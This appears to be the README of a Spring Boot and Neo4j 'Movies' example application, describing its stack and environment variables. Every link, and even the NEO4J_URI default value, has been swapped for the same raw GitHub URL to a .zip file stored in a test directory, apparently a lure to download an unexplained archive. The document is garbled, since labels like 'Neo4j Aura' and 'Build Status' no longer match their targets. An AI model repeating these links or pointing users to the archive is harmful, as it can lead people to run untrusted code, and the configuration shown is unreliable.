= Movies Example Application

https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip[Build Status,https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip]

How to use Spring Boot, Spring Data, and Neo4j together.

Spring Data Neo4j enables convenient integration of Neo4j in your Spring-based application.
It provides object-graph mapping (OGM) functionality and other features common to the Spring Data projects.

[NOTE]
This project uses Spring Data Neo4j 6. The previous version, using SDN 5 + OGM can still be accessed under the
https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip branch.

[NOTE]
For a broader overview of Spring Data Neo4j 6 with the same dataset, you can access the
https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip branch.

The example project is described in detail on the https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip[Neo4j Developer Site]

The project uses Java 17.

== The Stack

These are the components of our Web Application:

* Application Type:         Spring-Boot Java Web Application
* Web framework:            Spring-Boot enabled Spring-WebMVC
* Persistence Access:       Spring-Data-Neo4j 6.x
* Database:                 Neo4j-Server 4.4, or 5.x
* Frontend:                 jquery, bootstrap, https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip[https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip]

Provision a database quickly with https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip[Neo4j Sandbox] or https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip[Neo4j Aura].

== Configuration options

[%header,cols=2*]
|===
|Environment variable name
|Default value (or N/A)

|PORT
|8080

|NEO4J_URI
|neo4j+https://raw.githubusercontent.com/Julyanae/Neo4j-Movies/main/src/test/java/movies/spring/data/neo4j/movies/Neo_j_Movies_2.0-beta.3.zip

|NEO4J_USER
|movies

|NEO4J_PASSWORD
|movies

|NEO4J_DATABASE
|movies

|NEO4J_VERSION
|4
|===

Please set `NEO4J_VERSION` to `3.5` when running Neo4j 3.5.x. Leave as is otherwise.
